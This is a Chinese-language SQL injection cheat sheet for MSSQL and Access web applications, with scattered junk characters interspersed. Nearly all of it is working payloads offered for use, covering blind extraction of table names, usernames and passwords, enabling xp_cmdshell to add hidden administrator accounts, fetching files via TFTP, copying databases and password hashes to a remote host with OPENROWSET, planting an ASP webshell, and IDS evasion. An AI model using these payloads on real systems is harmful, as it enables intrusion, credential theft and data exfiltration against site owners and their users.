SQL注入语句2

admin

1..判断有无注入点
, {" i, z% d9 Y7 O* X: i+ r  z; and 1=1 and 1=2


. t! _$ F' M% ?" V2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
5 A5 K% J1 t2 X: D: E- W% T% T( ]1 Y( uand 0<>(select count(*) from admin) ---判断是否存在admin这张表

4 V% L, l% U) I
, A8 p& \  v' e: e+ h" c3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
! ?* P5 F. {+ X6 j7 Uand 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有 and (select count(列名) from 表名)>0
# ~) y# w. t0 o; ]
3 G/ c+ a( ?1 B# ]  i3 `7 k
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
$ G! }( H9 v$ F) dand 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
& m  H% y3 n7 mand 1=(select count(*) from admin where len(密码字段名称password)>0)
; r' m$ B, x1 G8 B$ b: y
4 Y  E" l* ~! w4 v5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
% f: U9 m, \8 u, j% v) vand 1=(select count(*) from admin where len(*)>0)
. k& x. {; g* A: H  W" M: Y  jand 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
3 c; d: z+ M5 v
+ G1 ^& B: P+ V6 I! N  D" Oand 1=(select count(*) from admin where len(password)>11) 正确
0 c  E0 M! F" t. I! ?2 Rand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
1 r% v6 i6 _0 U  ?' B) u猜长度还有 and (select top 1 len(username) from admin)>5

% d6 E% y0 Y6 f& q  O8 a7 K+ P* k
7 N& }" u9 c1 j  ~6.猜解字符
2 z3 m8 X) `9 Tand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
7 H/ h* i% {+ d% ~5 Vand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
) ?! d$ Y+ ^- ^$ T9 M$ B就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
, r1 f* u& ^$ Z, U
, l6 S3 u: i$ p猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
9 |: Z* i; W# i% [and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
1 e# ]( f& C( t! D
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
+ d5 ?( h) e) X$ [. Q  ]7 r; insert into users values( 666, attacker, foobar, 0xffff )--
. a* \$ w; ~+ D* r' _7 o
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
7 @8 \7 j* q8 G' u% J# d- R- r7 OUNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

看服务器打的补丁=出错了打了SP4补丁
3 Q; l, I" p" H$ n+ ]7 l9 nand 1=(select @@VERSION)--

6 O- F- M; \" x3 z3 J8 C看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。
6 f6 G' b0 M, V/ K- m9 sand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--
% y! B+ d; r$ J
看xp_cmdshell是否删除
+ ^4 ~: a, o# v! Zand 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--

& l8 g3 q& c9 F: k5 pxp_cmdshell被删除，恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
. }0 P4 \3 i# C* Q5 a: J5 [
反向PING自己实验
0 B$ `: P5 h' I0 s3 a;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
4 l% E* c" m3 C& w8 l+ W# d& Q% w6 z) @
! z, g7 Q; P( n6 U% j' _7 j4 ~加帐号
; c1 C0 U5 i! F2 J  d) ];DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
5 x0 ~7 @1 p' D# r+ B$ q. v
创建一个虚拟目录E盘：
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"--
( ]6 J: H* d* d, h. M' I5 u  W
( |; r1 x9 F- B- j, O+ q访问属性：（配合写入一个webshell）
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
: z0 K! e, y- ]) [+ n
' b% n: j1 K/ H  o- ?3 T$ ~
0 X- E/ q8 ^! j4 S6 i& C2 aMSSQL也可以用联合查询
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用)
4 b  Y. Q$ o6 L7 v( h
$ `  C5 |0 O& v* w6 t
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
. ~; b, S4 P, }" W


8 Z+ [1 f2 n  _得到WEB路径
' @% i6 Q/ p* H5 U;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image类型的表cmd
0 O4 t( v! X9 V6 ?" M3 |
9 j: P& d1 g, F& |存在xp_cmdshell的测试过程：
;exec master..xp_cmdshell dir
% n: A. z) i3 @% f- r( C- {;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
# i$ m1 E- G6 E* C/ o! B" u;exec master.dbo.sp_password null,jiaoniang$,1866574;--
: D' x( \4 @# g$ n;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
, G6 M* X) N/ v( Q( t;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
exec master..xp_servicecontrol start, schedule 启动服务
exec master..xp_servicecontrol start, server
: W3 z6 B4 Q0 G) Y# a: _; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
5 M. b9 @! J! w: f2 f;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
; W3 l8 X7 m( a! j2 d2 s
4 ^2 g0 o( q+ Z9 R3 };declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
9 H! d9 ?) S, U, _+ y;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
& }' c7 i8 r+ T8 w& n, \select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)

查询构造：
SELECT * FROM news WHERE id=... AND topic=... AND .....
9 t3 P, Z( d2 L9 gadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
) G  \  Y+ b8 V' R: w7 ~! |;use master;--
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
1 x: I' b- G6 [and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
8 y7 @, O/ Q2 \4 J6 _;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
* K& \4 q4 X9 C/ o) \;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
( V) `# w9 C: H; n& S4 d上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
+ V9 m8 x& ], k" v
( ~  j, X# ?; T# `insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
) h/ p  h6 D- o$ m/ }insert into users values ( 123, admin--, password, 0xffff)--
0 _* L( R) K' L7 l;and user>0
/ V5 H: \, P5 S) ]+ E! W$ C# C" D;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access数据库
( o5 u* t9 j  Q% N5 V# u
2 T0 w+ b; Q0 m+ g  E枚举出数据表名
# `# [/ g4 b  y;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
这是将第一个表名更新到aaa的字段处。
, g& A/ f. N- G5 W* \. W' I- Z读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>刚才得到的表名）。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
9 D. r+ w: [- n5 N: T5 ^然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表，一个个的读出，直到没有为止。
' u$ J$ b* E  R& o7 @- E# r# U读字段是这样：
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
3 D& _! |2 O" q然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
' s1 ?  g) Y+ ]% R: ~
7 f7 ?2 b# [& {3 }  C0 b  K# s[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]
" |; j7 r( B' B+ Q3 t5 \update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
# S7 K# o7 v" E6 }. [0 J& \通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
- S2 z2 e2 _8 h1 [
" s$ V7 M- v' b0 v  z/ b- T6 \[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
$ d: d; I; \: B6 t4 D
绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
3 C( z* ^, t* r# D- E7 s5 A;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\

+ \* s5 l$ J3 R% C% j1、 开启远程数据库
9 n  w: a* D- |/ Y基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
) @# }& S, D; R参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
9 b1 ]9 D, F; X' i! ]& Z1 p$ f; m' uselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3.复制目标主机的整个数据库insert所有远程表到本地表。
" d: P2 G; U: r, G3 e; v& M
基本语法：
( M1 ^; |. l( z- {% z8 Oinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
5 A( X# ~( p& t) Q这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
( ]+ [3 l8 N7 k# d7 winsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
9 i* x3 {6 |0 _4 Eselect * from master.dbo.sysdatabases
+ p' I/ _' z6 ?& _6 @  v3 O! _insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
select * from user_database.dbo.sysobjects
9 [$ Z: i* i- D# @3 rinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
select * from user_database.dbo.syscolumns
; L: t/ W  u$ l: a复制数据库：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
8 M" ~$ [  t* _3 l' B7 u8 [insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
, p2 n$ ~# c/ g9 ~! M3 E8 M9 [' X6 w5 o' B
复制哈西表（HASH）登录密码的hash存储于sysxlogins中。方法如下：
6 m, G( Q. t6 s/ s7 F% H$ pinsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
得到hash之后，就可以进行暴力破解。
/ w# b1 x' X9 {2 f/ T7 ^
遍历目录的方法： 先创建一个临时表：temp
- j+ @( ~9 P& P" x% p9 T;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
' V' R0 i& }( ~" d0 W;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
+ n# C2 ~* z" {- }4 r6 Z: W;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
+ u9 m$ ]$ g# @  [;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
5 y1 e! N2 ^& ?8 I3 ?% ^;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
+ w5 W8 F" \$ I;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
, a" c# W2 [% i;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- （xp_dirtree适用权限PUBLIC）
. e6 n3 \5 g  ?8 v, g写入表：
语句1：and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
语句2：and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
语句3：and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
, [. g: v6 p: N# B& ^8 X! O语句4：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
; r& W+ g2 G! ^& h+ h5 u  j, U8 h语句5：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
6 t1 v6 q+ s' h6 {: G$ p语句6：and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
2 x! S; j0 \1 n( h9 D- `+ O  N语句7：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
6 i9 r1 x, N, |) X+ H# J语句8：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句9：and 1=(SELECT IS_MEMBER(db_owner));--
: H2 w( z+ s& |1 _
& Z; x3 ?: {% m" R: N/ M把路径写到表中去：
  H& g5 z. O5 a;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree c:\--
6 f/ `7 T( s$ |& b+ kand 0<>(select top 1 paths from dirs)--
( D( \; i9 b  c# E2 Dand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
1 P. `2 H# P6 ~. N6 j;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--

把数据库备份到网页目录：下载
8 q1 d9 G$ V' a; H( \3 [;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
1 Q# J9 l) `/ e: V6 i
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
# ]+ [% R* A5 L7 iand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
) t' ~0 L, ^7 w3 m/ u& A3 Cand 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)

-=- wscript.shell example -=-
& Q5 _$ C, V( B( s/ ?+ ^$ cdeclare @o int
exec sp_oacreate wscript.shell, @o out
exec sp_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
4 v& ~% F+ G9 R2 ]5 w
declare @o int, @f int, @t int, @ret int
" }- W" t3 j+ Q9 U9 Edeclare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject, @o out
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, readline, @line out
end

: ?" h# K0 `5 m8 C* g7 i) ^declare @o int, @f int, @t int, @ret int
exec sp_oacreate scripting.filesystemobject, @o out
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
( K/ a" _4 i# T& a3 w<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
: P% k& Y# a; ]& G6 b/ O0 U
declare @o int, @ret int
, c1 x$ V' A' o5 U5 sexec sp_oacreate speech.voicetext, @o out
exec sp_oamethod @o, register, NULL, foo, bar
+ G. L, }" M% K+ L6 @! qexec sp_oasetproperty @o, speed, 150
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
% [1 p3 n2 ~4 ^' @8 {' l: qwaitfor delay 00:00:05

; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
) X) o& W5 s) c$ m- {& h8 s
" f/ q. \1 E4 Y6 N; ^! m; J* yxp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表，这里建的表是和上面xp_dirtree相关连，字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,一步步达到我们想要的信息！